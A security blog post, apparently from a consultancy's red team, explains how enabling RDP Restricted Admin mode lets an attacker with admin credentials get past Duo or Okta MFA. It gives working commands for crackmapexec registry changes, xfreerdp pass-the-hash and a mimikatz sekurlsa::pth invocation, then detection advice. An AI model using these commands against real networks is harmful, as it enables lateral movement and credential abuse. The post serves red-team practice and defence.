More Like This
-
Capability Overview
Cyber Resilience
-
Product / Service
Penetration Testing Services
In the last decade, Microsoft introduced a new Remote Desktop security feature called Restricted Admin mode to prevent credential caching and subsequent reuse. When enabled, the Restricted Admin mode allows circumventing multi-factor authentication (MFA) enforced by identity and access management solution providers such as Duo and Okta. While this weakness is known and has been documented by at least one of these providers, this blog post serves to demonstrate leveraging this caveat as a red team tactic.
In recent years, corporate environments have embraced identity and access management solution providers such as Okta and Duo to protect access to a host of applications and resources such as email, office suites, and cloud storage solutions. Those providers offer products to authenticate access to these applications with a number of options including MFA and passwordless authentication using mobile devices.
These technologies found their way into corporate Active Directory domain environments that have for years set the standard for centralized enterprise resource allocation and management. Those environments, comprised of Microsoft Windows servers and workstations, now have implemented MFA for a variety of logon processes ranging from a standard login by an employee at a workstation to a remote desktop login on a server by an administrator.
The addition of these authentication mechanisms in networked enterprise environments has made it increasingly difficult for red team operators and threat actors alike who may rely on Remote Desktop Protocol (RDP) as a means of lateral movement after obtaining an initial foothold. The underlying reason why Remote Desktop is a prime target for adversaries is because it is generally permitted by firewalls and other network security devices since administrators use it to jump around various servers and workstations with ease. While there are other services that may be permitted for smooth functioning of an Active Directory environment such as Microsoft Remote Procedure Call (MSRPC) and Server Message Block (SMB), Remote Desktop remains a critical attack surface to defend, as it is a legitimate way of logging onto a host without executing code that may be detected by antivirus or intrusion detection systems.
The adoption of Remote Desktop also shed light on other security weaknesses, namely caching of credentials on the Windows host being connected to. Specifically, the Windows Local Security Authority Subsystem Service (LSASS) process on the Remote Desktop host stores a copy of the credentials used for interactive logon authentication. These credentials are utilized to service subsequent connection requests to authenticated resources such as file shares. To combat this, Microsoft released an addition to RDP called Restricted Admin mode. This mode allows users that possess local administrative privileges on the Remote Desktop host to complete the authentication process without supplying the password in cleartext. As a result, the password is never cached on the logon host and cannot be reused by a threat actor to escalate privileges across the environment. At the same time, this functionality allows pass-the-hash attacks against RDP and hence puts corporations in a fix whether to prioritize chances of credential compromise versus reuse.
However, the specifics of the authentication process are of interest when operating in Restricted Admin mode. The distinction is between an “interactive” versus a “network” logon and since the Restricted Admin mode uses the latter (adopting a token-based method as compared to cleartext credentials), the authentication doesn’t take place on the Remote Desktop server but instead on the client itself. As a result, authentication factors enforced on the destination server such as MFA provisioned via Duo, Okta, or potentially other identity and access management solutions are rendered ineffective.
A caveat that arises from this mode within RDP is that threat actors can completely bypass MFA on servers and/or workstations when attempting to laterally move across the corporate environment if they possess administrative privileges. While the Restricted Admin mode is disabled by default, the following red teaming Tactics, Techniques, and Procedures (TTPs) describe how it could be leveraged to expand coverage and access across the network.
Imagine the following scenario: the adversary has gained an initial foothold within a firm’s internal network infrastructure and has access to a set of administrative credentials that can be used to compromise a domain-connected Windows host. They have attempted to log on via RDP but there’s a multi-factor mechanism that is sending a push notification to the victim user’s phone and awaiting approval. At this point, the adversary could attempt an MFA fatigue attack by spamming the victim device with push requests in hope that they accept the notification, but this approach is noisy and has rate limitations.
Since they have access to credentials, they can interrogate an administrative session over port SMB/445 (which does not enforce MFA as it’s a network logon) and enable the restricted admin mode:
crackmapexec smb <IP> -u <username> -p <password> -x 'reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD'
Next, they can generate the NTLM hash for the supplied password and bypass MFA on the Remote Desktop server using FreeRDP on Linux:
xfreerdp /v:<IP> /u:<victim username> /d:<domain> /pth:<victim password-hash>
Or the official Remote Desktop client on Windows (logged-on user’s context):
mstsc.exe /restrictedadmin
On Windows, they can either hijack the logged-on user’s context or request a service ticket using mimikatz:
mimikatz # sekurlsa::pth /user:<victim username> /domain:<domain> /ntlm:<victim password hash> /run:"mstsc.exe /restrictedadmin"
In order to detect this MFA bypass, EDR systems and/or system administrators should monitor the server registry to ensure that the DisableRestrictedAdmin key is set to 1, which indicates that the mode remains disabled. In the event that this value is modified, a security alert should be triggered which causes the isolation and quarantine of the originating host in order to stop the adversary in their tracks. While these recommendations serve as detective and responsive controls, there is no known remediation at the time of writing for this issue, which has been documented by some identity and access management vendors such as Duo but not all.
Capability Overview
Cyber Resilience
Product / Service
Penetration Testing Services
About Cyber Solutions:
Aon’s Cyber Solutions offers holistic cyber risk management, unsurpassed investigative skills, and proprietary technologies to help clients uncover and quantify cyber risks, protect critical assets, and recover from cyber incidents.
General Disclaimer
This document is not intended to address any specific situation or to provide legal, regulatory, financial, or other advice. While care has been taken in the production of this document, Aon does not warrant, represent or guarantee the accuracy, adequacy, completeness or fitness for any purpose of the document or any part of it and can accept no liability for any loss incurred in any way by any person who may rely on it. Any recipient shall be responsible for the use to which it puts this document. This document has been compiled using information available to us up to its date of publication and is subject to any qualifications made in the document.
Terms of Use
The contents herein may not be reproduced, reused, reprinted or redistributed without the expressed written consent of Aon, unless otherwise authorized by Aon. To use information contained herein, please write to our team.
Our Better Being podcast series, hosted by Aon Chief Wellbeing Officer Rachel Fellowes, explores wellbeing strategies and resilience. This season we cover human sustainability, kindness in the workplace, how to measure wellbeing, managing grief and more.
Expert Views on Today's Risk Capital and Human Capital Issues
Expert Views on Today's Risk Capital and Human Capital Issues
Expert Views on Today's Risk Capital and Human Capital Issues
The construction industry is under pressure from interconnected risks and notable macroeconomic developments. Learn how your organization can benefit from construction insurance and risk management.
Stay in the loop on today's most pressing cyber security matters.
Our Cyber Resilience collection gives you access to Aon’s latest insights on the evolving landscape of cyber threats and risk mitigation measures. Reach out to our experts to discuss how to make the right decisions to strengthen your organization’s cyber resilience.
Our Employee Wellbeing collection gives you access to the latest insights from Aon's human capital team. You can also reach out to the team at any time for assistance with your employee wellbeing needs.
Explore Aon's latest environmental social and governance (ESG) insights.
Our Global Insurance Market Insights highlight insurance market trends across pricing, capacity, underwriting, limits, deductibles and coverages.
How do the top risks on business leaders’ minds differ by region and how can these risks be mitigated? Explore the regional results to learn more.
Our Human Capital Analytics collection gives you access to the latest insights from Aon's human capital team. Contact us to learn how Aon’s analytics capabilities helps organizations make better workforce decisions.
Explore our hand-picked insights for human resources professionals.
Our Workforce Collection provides access to the latest insights from Aon’s Human Capital team on topics ranging from health and benefits, retirement and talent practices. You can reach out to our team at any time to learn how we can help address emerging workforce challenges.
Our Mergers and Acquisitions (M&A) collection gives you access to the latest insights from Aon's thought leaders to help dealmakers make better decisions. Explore our latest insights and reach out to the team at any time for assistance with transaction challenges and opportunities.
How do businesses navigate their way through new forms of volatility and make decisions that protect and grow their organizations?
Our Parametric Insurance Collection provides ways your organization can benefit from this simple, straightforward and fast-paying risk transfer solution. Reach out to learn how we can help you make better decisions to manage your catastrophe exposures and near-term volatility.
Our Pay Transparency and Equity collection gives you access to the latest insights from Aon's human capital team on topics ranging from pay equity to diversity, equity and inclusion. Contact us to learn how we can help your organization address these issues.
Forecasters are predicting an extremely active 2024 Atlantic hurricane season. Take measures to build resilience to mitigate risk for hurricane-prone properties.
Our Technology Collection provides access to the latest insights from Aon's thought leaders on navigating the evolving risks and opportunities of technology. Reach out to the team to learn how we can help you use technology to make better decisions for the future.
Trade, technology, weather and workforce stability are the central forces in today’s risk landscape.
Our Trade Collection gives you access to the latest insights from Aon's thought leaders on navigating the evolving risks and opportunities for international business. Reach out to our team to understand how to make better decisions around macro trends and why they matter to businesses.
With a changing climate, organizations in all sectors will need to protect their people and physical assets, reduce their carbon footprint, and invest in new solutions to thrive. Our Weather Collection provides you with critical insights to be prepared.
Our Workforce Resilience collection gives you access to the latest insights from Aon's Human Capital team. You can reach out to the team at any time for questions about how we can assess gaps and help build a more resilience workforce.
Article 7 mins
As healthcare costs continue to rise, employers are trying to balance the need to take care of their workers with the need to keep costs under control. Aon’s 2025 U.S. Health Survey provides insights into the choices employers are making, and their potential effects on costs.
Article 6 mins
Non-financial risks are often difficult to predict and quantify, yet present a real threat to financial institutions. In this volatile environment, risk management is playing a greater role in creating business resilience and identifying where capital should be deployed.
Article 9 mins
Daniel Halter, Director Global Insurance at Sandoz, discusses, how smart risk & insurance management supported the Sandoz core mission to provide affordable, off-patent medicines to patients who need them most with Ana Serdarevic, Head of Aon’s Transaction Advisory Services for DACH.
Article 8 mins
U.S. freight and commuter rail industries are facing excess liability and property issues for different reasons. These railroads are critical to infrastructure and vital to the economy, yet finding effective solutions remains complex.
Article 11 mins
As private companies prepare for an IPO, they face increased risks that require directors and key leaders to adopt essential risk management strategies to ensure a smooth transition.
Article 10 mins
As climate change intensifies the frequency and severity of extreme weather events, public entities and businesses need more flexible funding solutions. Parametric stands out as an adaptable resource capable of swiftly responding to potential disasters.
Article 17 mins
Funding challenges due to macroeconomic factors have prevented several green and blue hydrogen projects from getting off the ground. Organizations facing hurdles in accessing capital can work with risk and insurance experts to expedite projects and help make the promise of hydrogen a reality.
Article 11 mins
Learn how strong human capital strategies can help recruit, retain and motivate vital talent in a competitive and evolving job market.
Article 7 mins
As corporate boards meet to discuss strategy, including any changes to executive compensation, there are key trends to consider for the year ahead.
Article 6 mins
Companies aiming to be a net-zero company may face many challenges during the biofuels transition. Read more on risk strategies to cut through complexity.
Article 6 mins
With DC schemes growing across Europe, many organizations are realizing the importance of ensuring strong performance from their investments. Here’s how asset owners and managers can optimize DC outcomes through the right investment strategy.
Article 9 mins
With no federal paid leave law in the U.S., employers have limited guidance in designing equitable and comprehensive paid leave programs to support their workforce. Looking beyond compliance to focus on strategy and values will help create fair and well-designed policies.
Article 8 mins
Risk managers are increasingly looking to Alternative Risk Transfer Solutions for potential enhancements in managing risk.
Article 8 mins
Amid economic uncertainty, companies are taking a careful approach to hiring and salary planning — one that includes focused hiring strategies, revising salary budgets and implementing measures that respond to the current economic environment.
Alert 7 mins
The current operating environment in the Middle East is increasingly complex and multifaceted, characterized by ongoing conflicts in Gaza, Israel, Lebanon and neighboring states, alongside significant changes in the business and insurance environment.
Article 8 mins
Hurricanes Helene and Milton insured loss estimates are expected to fall between $34 billion and $54 billion. Healthy, well-capitalized insurance and reinsurance markets are positioned to absorb those losses.
Article 17 mins
Buyer-friendly conditions continued across much of the global insurance market in Q3, painting a largely positive picture as we head into year-end renewals.
Article 10 mins
A successful M&A strategy relies on due diligence across financial, legal, human capital, technology, cyber security and intellectual property risks. As cyber threats become more complex, robust cyber due diligence in private equity and acquisitions is increasingly necessary.
Article 8 mins
Cargo theft in the transportation industry is escalating, driven by sophisticated criminal tactics that exploit both physical and digital vulnerabilities. Businesses must adopt proactive risk management strategies to counter these evolving threats.
Article 11 mins
Trade, technology, weather and the workforce are interconnected trends shaping the future of business in North America. Understanding them is key to long-term resilience.
Article 9 mins
Competition and capacity are dominating the cyber liability market and pricing remains favorable as a result. Taking advantage of the current buyer’s market to build sustained cyber resilience is the key to success.
Article 10 mins
The growing renewable energy sector is boosting M&A activity. Risk transfer solutions can help unlock capital access in these transactions.
Article 7 mins
Digitalization presents both opportunities and challenges in life sciences, driving new organizational approaches to human capital to keep up with evolving talent needs while building a resilient workforce.
Article 5 mins
As financial institutions reshape human capital strategies for the digital age, leaders face pressure to balance the risks and opportunities of digitalization.
Article 9 mins
Employers are concerned that previous wellbeing strategies aren’t moving the needle enough. But when wellbeing is part of an organization’s culture, it has positive effects on costs, engagement and productivity.
Article 6 mins
Financial institutions can increase their resilience to volatile threats through enhanced risk management frameworks and innovative models powered by people data and technology.
Article 10 mins
As the deadline for implementing the EU Pay Transparency Directive fast approaches, some financial institutions feel unprepared to comply. These five steps can help guide the way through the upcoming regulatory landscape.
Article 9 mins
Thriving organizations rely on thriving employees to succeed. With healthcare costs on the rise, it’s time for employers to challenge the status quo in providing health benefits. Organizations need to consider the human side of these increases and take bold action to achieve better outcomes.
Article 9 mins
The aviation industry is watching the rise in nuclear verdicts with concern as social inflation and associated risks continue to squeeze the sector. Organizations should review their risk management processes to limit the dollar value of future losses.
Article 12 mins
As AI evolves, directors and officers must maneuver through a complex landscape of regulatory and legal risks. Implementing best practices around the use of AI and robust governance-focused risk mitigation can help manage exposures.
Article 11 mins
Middle market organizations face unique challenges in the ever-changing cyber environment, requiring holistic insurance solutions and enhanced resilience readiness to manage risks that could impact profitability.
Article 17 mins
With life expectancies and retirement ages on the rise, organizations can capitalize on the value that older employees offer and support them by fostering a workplace where both the business and its people thrive.
Article 8 mins
As climate change compounds wildfire risk, organizations play a critical role in protecting their workforce before and after an event.
Article 10 mins
The transportation and logistics industry faces unique challenges which can negatively impact employees' health. A cultural shift to more tailored wellbeing strategies can improve health outcomes and boost company performance.
Article 8 mins
As workforce and skills shortages emerge as a significant future risk, companies seek winning talent and tech solutions.
Article 6 mins
Pooled employer plans (PEPs) can offer a streamlined solution to the retirement planning challenges inherent in spin-off and M&A events.
Article 20 mins
The role of HR professionals is becoming more strategic, which requires collaboration with other areas of an organization to help drive growth. Given that people and benefit costs are a large portion of business expenses, partnering with finance is a natural step forward.
Article 5 mins
Aon analyzes employee perception about return to office policies following the COVID-19 pandemic, as well as recent actions one organization took for alleged lack of remote employee productivity.
Article 11 mins
Despite subdued global M&A in 2023, positive trends have been emerging in the M&A insurance market to help clients improve their deal-making and ‘value-protection on investment’.
Article 7 mins
Graeme Hudson and Ghonche Alavi from Crisis24 discuss Crisis24’s approach to Political Evacuation and Threat Management with Cara LaTorre from the Financial Services Group at Aon.
Article 8 mins
European construction contractors are looking with increasing interest at Asia, but to expand successfully into the region, they need to overcome key workforce and market challenges.
Article 8 mins
As digitalization presents new risks and opportunities for life sciences organizations, implementing cyber and data resilience ensures that innovation doesn’t result in business interruption.
Article 7 mins
For insurers, making decisions on where and how to deploy capital becomes more difficult during times of volatility.
Article 6 mins
Employers in the U.S. should understand the unique risks associated with voluntary benefit captives when considering alternative insurance arrangements for their voluntary benefit plans.
Article 7 mins
Workers compensation is an area of risk management that could benefit from a more holistic approach. A safety program that incorporates wellbeing and uses data in a meaningful way can contribute greatly to lowering costs.
Article 8 mins
Firefighters face a unique set of risks and long-term health consequences from their jobs. Aon worked with Minnesota firefighters to create a benefit program to address three primary health issues.
Article 8 mins
Open legacy workers compensation claims place rising financial burdens on employers, who are faced with closing out aged claim inventory and improving their balance sheets in the process.
Article 5 mins
Organizations must consider the impact of climate change on property, which will vary now and years into the future. Therefore, a thoughtful approach can enhance risk mitigation and resilience strategies.
Article 9 mins
Helping midsize organizations strike the right balance between risk and compliance with a comprehensive regulatory and compliance framework.
Article 6 mins
As U.S. employers balance costs with providing employees more value from their benefits, creating an annual healthcare enrollment process that includes more choice and guidance can accomplish both goals.
Article 10 mins
With many insurers reporting healthy profits in 2023, and in response to notable improvements in the reinsurance market, the insurance market in Q2 2024 remained growth-oriented.
Alert 3 mins
On July 19, 2024, the CrowdStrike outage became one of the largest IT events in history, impacting businesses and customers around the world. Leaders now have an opportunity to reexamine technology dependencies and business continuity plans to mitigate similar risks in future.
Article 7 mins
Insurers are some of the world’s largest institutional investors. Recognising their crucial role in driving the global climate transition, they should identify and analyse climate-related risks and opportunities to improve long-term risk-adjusted returns.
Article 8 mins
The global CrowdStrike IT outage demonstrated that even non-malicious cyber incidents may have serious repercussions. Events like these serve as a wake-up call for businesses to review their cyber resilience and be prepared for more significant incidents in the future.
Article 7 mins
More global benefits professionals are aligning benefit strategy to an employer’s identity and values.
Alert 10 mins
CrowdStrike, a global cybersecurity firm, released an update for its Falcon sensor, which caused system crashes on Microsoft Windows systems globally.
Article 8 mins
Cyber incidents continue to grow in frequency and severity, especially as new technology emerges. While D&O and cyber liability policies offer distinct coverage differences, terms need to be carefully structured to avoid potential gaps.
Article 6 mins
Insurers are venturing into the thriving digital landscape of the Metaverse, covering virtual assets, safeguarding intellectual property, and protecting the wellbeing of users and avatars. With this evolution, comes new challenges and the unique opportunity to shape the future of insurance.
Article 10 mins
Record-warm Atlantic Ocean temperatures and a shift to La Niña conditions have led forecasters to predict an extremely active Atlantic hurricane season in 2024. Learn how to build business resilience to mitigate risk for hurricane-prone properties.
Alert 7 mins
The U.S. Supreme Court has changed the way laws are interpreted in the development of regulations. This change has the potential for far-reaching consequences for both regulatory agencies and employers.
Article 18 mins
For institutional investors, engaging an outsourced chief investment officer, or OCIO, is one of the most critical decisions an organization can make. Choosing the right partner can lead to achieving the desired results or unexpected consequences.
Article 4 mins
Overview of the current trade credit insurance market and outlook on trend developments.
Article 11 mins
The need to attract and retain high-quality talent in an environment of intense competition is at the forefront of professional services leaders’ minds.
Article 11 mins
Renewable energy is critical to meet net-zero targets, but as the industry grows, so do cyber attack surfaces. Learn how to prepare for emerging threats and support long-term ambitions.
Article 7 mins
As the scale and speed of interconnected risks escalate, innovative risk management strategies help FAB businesses build the resilience and agility needed to thrive.
Article 10 mins
The renewable energy sector is undergoing a sweeping transformation, as it plays a pivotal role in the challenge to achieve global net-zero goals. Attracting, upskilling and retaining talent is critical for sustainability.
Article 7 mins
Contractors in EMEA face an array of risks they must mitigate or transfer while managing the complexities inherent in major construction projects.
Article 12 mins
As more companies seek to reduce their carbon footprint, the renewable energy sector continues to grow, presenting both opportunities and red flags for organizations with renewable energy growth plans.
Article 6 mins
Proactive risk management and data-driven reshoring strategies can empower risk managers in logistics companies to navigate supply chain complexities with confidence.
Article 5 mins
As more companies become comfortable using captives and understanding the value they add, captives are likely to become further embedded into corporate risk strategies, regardless of market conditions.
Article 6 mins
Helping midsize organizations leverage key partnerships to address challenges around talent, market, regulatory compliance, and leveraging capital.
Article 12 mins
A rapid rise in medical plan costs is being driven in part by high-cost claimants — a high-risk group that disproportionately accounts for a large amount of healthcare costs. Here are strategies for addressing this issue.
Article 9 mins
Online benefits platforms are a key component of the overall employee value proposition. As employers maximize the ROI of their people spend, here are four tips which may assist with implementing a successful online benefits platform.
Article 8 mins
Efforts to bring more transparency to pay practices shine a light on benefits equity — and it’s not only about wages and salary.
Article 3 mins
The rapid pace of digitalisation means that organisations in the UK are constantly struggling with the ever-present threat of cyber attacks.
Article 2 mins
Equity has an important part to play in a balanced strategy to improve the attraction and retention of key employees.
Article 2 mins
How are business leaders adapting to a generational change in how work gets done?
Article 2 mins
Lori Goltermann, CEO of Regions and Enterprise Clients, Aon examines the main issues discussed at the event.
Article 2 mins
Our panel discussion looked at the issues facing corporate treasurers and how they have become more complex and interconnected.
Article 3 mins
Businesses are still in search of competition, alternatives and innovation in their insurance programmes.
Article 2 mins
Companies and financial sponsors are constantly seeking innovative and capital-efficient ways to facilitate M&A deals.
Article 2 mins
Professor Trevor Williams analyses the latest indicators and what they mean for the UK — and global — economy.
Article 2 mins
How Aon is moving further, faster to bring new, innovative solutions that address companies’ risk and people challenges.
Article 5 mins
Today's employers need to continually learn and adapt to emerging technologies and skills if they are to thrive in the talent landscape.
Article 3 mins
Companies that operate around the world need to have a global appreciation of the heightening geopolitical risk.
Article 6 mins
Collective retirement plans are growing in popularity and improving employees’ financial wellbeing in the process. Other advantages that haven’t been as widely explored include how these retirement structures allow HR to shift its focus to strategy.
Article 8 mins
Getting ahead of risk is vital for North American construction contractors, as they aim to manage evolving issues, while delivering job safety, solving workforce shortages and containing project costs.
Alert 6 mins
The Department of Labor released a final rule increasing overtime protections for the standard salary level threshold for the “white collar" exemptions and the threshold for employees classified as Highly Compensated Employees. Employers need to prepare for these significant changes.
Article 10 mins
Climate change adaptation and the transition to net zero present huge premium growth opportunities for insurers. The key question is how to get started.
Article 7 mins
As the cyber insurance landscape continues to evolve in EMEA, companies need actionable insights and solutions to strengthen their cyber risk strategies.
Article 9 mins
The challenges of 2023 eroded the buffers that many insurers had previously enjoyed, bringing an increased focus on capital management and a variety of capital sources according to Aon’s capital poll.
Report 18 mins
While advancements in AI, cyber and data technology are helping companies operating in an increasingly digital world gain a significant competitive edge, they also introduce new and evolving risks.
Article 6 mins
As healthcare costs rise, voluntary benefits are a critical component of engaging employees, while also helping to manage direct and indirect medical expenses. Here are three strategies for employers to make the most of their voluntary benefits.
Article 8 mins
The expansive scope, stringent sanctions and pivotal role of management related to the new NIS2 Directive provide a strong foundation to protect against evolving cyber risks.
Article 8 mins
The London insurance market seeks a generation of game-changers who can navigate uncertainties and drive innovation to ensure the industry’s future success in a digitalised world.
Article 3 mins
From global supply chain risks to climate insecurity, organizations face challenges and complexities on a scale rarely seen before.
Article 15 mins
Artificial intelligence is having a measurable impact across all aspects of HR — from talent management to compensation, health and benefits, and retirement planning. To effectively harness the technology, HR leaders must ensure both their own teams and the wider workforce are prepared.
Article 3 mins
Risk Capital CEO Andy Marcell and Human Capital CEO Lambros Lambrou discuss how innovations in Risk Capital and Human Capital can help organizations boost resilience and navigate volatility.
Report 15 mins
Global business leaders highlight risks linked to trade as some of their top concerns — both physical and financial. While the topic is complex and broad, there are opportunities that business leaders can pursue to stay ahead of emerging trade dynamics.
Report 16 mins
Extreme weather and a changing climate are impacting many of the risks businesses face today. To address future exposures, organizations will need advanced climate and natural catastrophe models and expertise that can assess chronic and acute risks.
Report 14 mins
Engaging a changing workforce requires data and innovation. Workers increasingly expect more than just a paycheck. In response, organizations are balancing costs with the ability to provide a compelling employee experience.
Case Study 3 mins
Aon partnered with UK financial advice firm M&G Wealth to help the firm better understand the make-up of a highly successful advisor of the future, including the skills needed given shifts in societal needs, technology and regulation.
Article 8 mins
Advanced analytics can empower organizations with deeper insights into the risks and opportunities surrounding renewables, while also supporting energy transition investment.
Article 17 mins
Positive performance in 2023 fueled insurer growth ambitions but underwriting remained disciplined in the first quarter of 2024.
Article 12 mins
While digitalization is delivering transformational change to R&D across the sector, it is also rapidly reshaping recruitment and retention strategies.
Alert 6 mins
The FTC has announced a rule that bans noncompetes and clauses that have a similar effect. While the rule will face legal challenges, employers should take steps now to prepare for an environment where they cannot use noncompete agreements.
Article 7 mins
Risk advisory services can help construction stakeholders navigate uncertainties, optimize performance and drive growth in their projects.
Article 9 mins
While there are similarities in the risk profile of floating offshore wind and bottom-fixed offshore wind, challenges like unproven technology and tow-to-port strategies for maintenance require a collaborative approach between owners/developers and their insurance partners.
Article 4 mins
Macrotrends are transforming our world and creating emerging property-casualty exposures, which will have profound implications for the insurance industry.
Article 7 mins
Understanding market trends and future projections in an evolving cyber insurance market is paramount to strengthening risk mitigation and transfer strategies.
Article 5 mins
In an era of escalating climate-related challenges, the construction industry is turning to advanced climate modeling to fortify its risk management strategies.
Article 14 mins
Advances in technology will not only transform healthcare and treatment outcomes — benefit offerings, access to care, diagnosis, treatment and affordability challenges will also be radically changed. Here is what to expect as these efforts take shape globally.
Article 10 mins
As healthcare costs continue to rise, employers are struggling to balance cost control with attracting and retaining talent. The results of Aon's 2024 U.S. Health Survey point to key strategies organizations are using to help.
Article 11 mins
As the world races to reduce climate risks and limit CO<sub>2</sub> emissions, the demand for scalable and cost-effective decarbonization technologies is increasing. Carbon capture projects form an important part of the low carbon energy transition, bringing both challenges and opportunities.
Article 7 mins
Growing extreme heat conditions have escalated risks, delays and costs for the construction industry in North America. Parametric insurance can help protect against such risks, offering contractors and building owners agility, efficiency and flexibility.
Article 9 mins
The launch of the Unified Patent Court allows for a new patent filing process across Europe using a centralized system. While this brings significant financial and operational benefits, navigating these changes will demand a robust litigation risk management strategy.
Article 8 mins
Construction projects in EMEA are often impacted by extreme heat, leading to project delays and increased costs. Many heat exposures are excluded by traditional markets, however, parametric is a flexible solution that can help mitigate these risks.
Article 12 mins
New regulations in the U.S. and Europe will require companies to be more transparent about their pay practices. Combined with willingness among workers to talk about salary, the era of pay transparency is here.
Article 11 mins
As companies tailor their health and benefits to meet the needs of their employees, vital areas for support include family building and menopause.
Article 7 mins
Complex market dynamics in the construction industry are pushing organizations to proactively explore alternative risk transfer solutions, including parametric insurance and captives.
Article 11 mins
As new job roles and technologies emerge in the natural resources industry, employee expectations are also shifting. Leaders must rise to the challenge of securing talent to meet the world’s future energy needs.
Article 5 mins
Rulemaking from the Securities and Exchange Commission (SEC) highlights the importance of company transparency with investors and regulators around risk management and the impact of cyber events.
Article 13 mins
Five ways financial institutions can balance investment with prudence in an uncertain economic climate.
Article 12 mins
An increasingly interconnected and complex risk landscape continues to shape risk strategies and market responses.
Article 13 mins
To be successful, business leaders must keep pace with the key trends that will impact the risk and insurance landscape in 2024.
Article 9 mins
Taking a new approach to talent management and planning for worker shortages can help businesses in the energy and power industries build greater operational resilience.
Article 8 mins
As organizations build diversity, equity, inclusion and belonging in the workplace, they must also ensure benefit plans are designed and customized to meet the needs of a diverse workforce.
Article 11 mins
For investors, climate change means navigating uncertainties and understanding a wide range of potential outcomes.
Article 8 mins
Extreme cold and freeze were responsible for $15 billion worth of structural damage in recent years, as well as business interruption and supply chain impacts. We explore the threat chronic hazards pose and consider the influence of climate change on business.
Article 7 mins
The global D&O market remains soft, creating a favorable environment for buyers. With abundant capacity and increased competition, capitalizing on conditions now is critical as rates are showing signs of moderating.
Article 17 mins
It's never been more important for HR leaders to help shape and support the execution of business strategies. However, to be successful in today’s volatile world, HR teams must stand ready to understand and harness five fast moving trends.
Article 9 mins
Supply chain disruptions can have serious reputational repercussions, causing plummeting shareholder value and diminished stakeholder trust. The potential fallout underscores the need for management strategies that collectively address these risks.
Article 13 mins
To feed a growing global population, FAB organizations must build operational resilience to overcome supply chain, cyber, geopolitical and climate risks.
Article 10 mins
Businesses considering pension risk transfer to mitigate volatility should prepare now to be well-positioned for market opportunities.
Article 7 mins
Improving retirement plan governance is crucial during economic uncertainty. Collective retirement plans, like a pooled employer plan, reduce risk and streamline administrative expenses for employers while also boosting employee support.
Article 4 mins
Senior executives aren’t letting a tough market for transactions stop them from finding new approaches to closing deals.
Article 7 mins
To stay competitive, middle-market companies need to navigate the current economic volatility and invest in their technology and talent.
Article 7 mins
Host and chief marketing officer, Reinsurance Solutions, Alexandra Lewis, is joined by UK Investment Partner at Aon, Jennifer O’Neill, for insights into the critical role that biodiversity plays in planning for the future.
Article 6 mins
Organizations faced complex challenges in risk capital and human capital throughout 2023, prompting leaders to turn to new ways of doing business.